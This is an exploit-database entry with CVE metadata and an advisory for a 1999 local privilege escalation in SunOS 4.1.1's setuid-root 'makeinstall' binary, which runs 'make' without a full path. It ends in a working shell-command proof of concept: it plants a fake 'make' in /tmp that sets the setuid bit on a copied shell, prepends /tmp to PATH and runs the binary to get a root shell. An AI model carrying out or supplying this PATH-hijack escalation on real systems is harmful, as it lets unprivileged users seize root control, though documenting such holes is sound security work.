SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation
Author: anonymous
type: local
platform: solaris
port:
date_added: 1999-11-23
date_updated: 2017-11-16
verified: 1
codes: CVE-1999-1123;OSVDB-12951
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source: https://www.securityfocus.com/bid/21/info
This applies to sites that have installed Sun Source tapes
only.
The Sun distribution of sources (sunsrc) has an installation
procedure which creates the directory /usr/release/bin and
installs two setuid root files in it: makeinstall and winstall.
These are both binary files which exec other programs:
"make -k install" (makeinstall) or "install" (winstall) without
a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/make
$ chmod a+rx /tmp/make
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/makeinstall
$ /tmp/sh
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